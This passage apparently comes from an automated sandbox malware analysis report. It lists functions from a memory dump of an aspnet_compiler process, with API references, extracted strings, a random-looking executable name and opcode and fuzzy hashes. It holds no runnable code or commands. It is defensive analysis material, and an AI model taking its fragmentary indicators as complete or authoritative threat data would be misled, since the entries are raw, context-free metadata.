                                                          • ___swprintf_l.LIBCMT ref: 0080156D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: 1924cd2390e75d3623115d16d08eb0e789da53a90001f57d3126bad5ba7f5f1b
                                                          • Instruction ID: 3c8a56365d70108bdc6855e8bc19f4e9f6f1162eda8bb2be2288fedafefed3a9
                                                          • Opcode Fuzzy Hash: 1924cd2390e75d3623115d16d08eb0e789da53a90001f57d3126bad5ba7f5f1b
                                                          • Instruction Fuzzy Hash: A821D172A0062D9BCF60DE58DC49AEE73ACFB50714F444019FD46E7280DB749A588BE0
                                                          Function 00863DA7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: %%%u$]:%u
                                                          • API String ID: 48624451-3050659472
                                                          • Opcode ID: b7371dd1d850f0314dacd8f72aab2f776f5865219e7781e6b92b46d250671f01
                                                          • Instruction ID: 6c3a534e902eaf216f273edbb6907963993d47f8e365ed151b9817703ec2683f
                                                          • Opcode Fuzzy Hash: b7371dd1d850f0314dacd8f72aab2f776f5865219e7781e6b92b46d250671f01
                                                          • Instruction Fuzzy Hash: 3C21AFB290021AABCB20AE698C49EEF77ACEB14714F050529FD08E3541EB75AF44C7E1
                                                          Function 007E53A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008222F4
                                                          Strings
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 008222FC
                                                          • RTL: Resource at %p, xrefs: 0082230B
                                                          • RTL: Re-Waiting, xrefs: 00822328
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-871070163
                                                          • Opcode ID: ac46b015f1b21f22301c63592aebb90fbaac7182dd3887d925b630df0e1cb42e
                                                          • Instruction ID: 49ff51c0abe7dcb2eafc29887b0eae5d7f6c006dfb267790be26a10e63ff1780
                                                          • Opcode Fuzzy Hash: ac46b015f1b21f22301c63592aebb90fbaac7182dd3887d925b630df0e1cb42e
                                                          • Instruction Fuzzy Hash: 2B5158B1601715ABEB11DF29DC85FA673ACFF59368F104229FD04DB281EA75EC8187A0
                                                          Function 007EEC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0082248D
                                                          • RTL: Re-Waiting, xrefs: 008224FA
                                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 008224BD
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                          • API String ID: 0-3177188983
                                                          • Opcode ID: dc4bbf34c20c38ee26c5c1fe58221655b59a7bb04f9b7f81b964b99dbc6cfb59
                                                          • Instruction ID: f35d9759fca21ee4a5537d033164a742ba37f9c1f716f4240c1a18b9d7a8ea4c
                                                          • Opcode Fuzzy Hash: dc4bbf34c20c38ee26c5c1fe58221655b59a7bb04f9b7f81b964b99dbc6cfb59
                                                          • Instruction Fuzzy Hash: 684116B0600214BBC720EF69DC89FAA77B8FF49720F208A19F555DB2D1D738E9818765
                                                          Function 007FFCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: __fassign
                                                          • String ID:
                                                          • API String ID: 3965848254-0
                                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                          • Instruction ID: a52ed7e16023f7717189cd9bfc176b50284a588be76629e10098be264af4e5e1
                                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                          • Instruction Fuzzy Hash: 06917D71D0021EEBDF24CF98C8456FEB7B4FF55314F20807AD611A62A2EB385A81CB95
                                                          Function 0087E9FF Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 435COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0087ED1C
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0087ED32
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: vvTbuaRHiqEobl.exe
                                                          • API String ID: 885266447-2409990139
                                                          • Opcode ID: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                          • Instruction ID: 335af9b2b2547001cdb669237ff5c05ce8b2b0502d25b5ce2871536034b31473
                                                          • Opcode Fuzzy Hash: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                          • Instruction Fuzzy Hash: 51022DB1900649EFDB55DF68C880BEABBF4FF08300F0085AAE999D7651D734E995CB60
                                                          Function 0087C371 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0087C4BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: "$vvTbuaRHiqEobl.exe
                                                          • API String ID: 885266447-4172648010
                                                          • Opcode ID: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                          • Instruction ID: c3889e2d5357c24ccd09d993041286592535e97091ecbf9d8ba772abd828cabf
                                                          • Opcode Fuzzy Hash: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                          • Instruction Fuzzy Hash: 24419AB1A00609EFDB24DF68C885BBAB7B5FB44304F14C86DE85ADB259D734E940CB18
                                                          Function 007FC558 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          • 1|, xrefs: 007FC56F
                                                          • {%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 007FC5BB
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.541838818.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true
                                                          • Associated: 0000000D.00000002.541838818.00000000007A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000890000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008A7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.00000000008B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000D.00000002.541838818.0000000000910000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_13_2_7a0000_aspnet_compiler.jbxd
                                                          Similarity
                                                          • API ID: ___swprintf_l
                                                          • String ID: 1|${%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                                          • API String ID: 48624451-2539551474
                                                          • Opcode ID: a2dc6f9a14de071ee7cb5828ffe0ca19fc30a264112499922f197f13a55a8e13
                                                          • Instruction ID: be9e76c6ed31a3c9028a4ab55ee352b91360bc4cb91aa1ae7cb9a71bc48348e2
                                                          • Opcode Fuzzy Hash: a2dc6f9a14de071ee7cb5828ffe0ca19fc30a264112499922f197f13a55a8e13
                                                          • Instruction Fuzzy Hash: 2D0161A60085B465D32187AA4C11832FBF99FCEA15728C08EF7D88A296E17FC542D774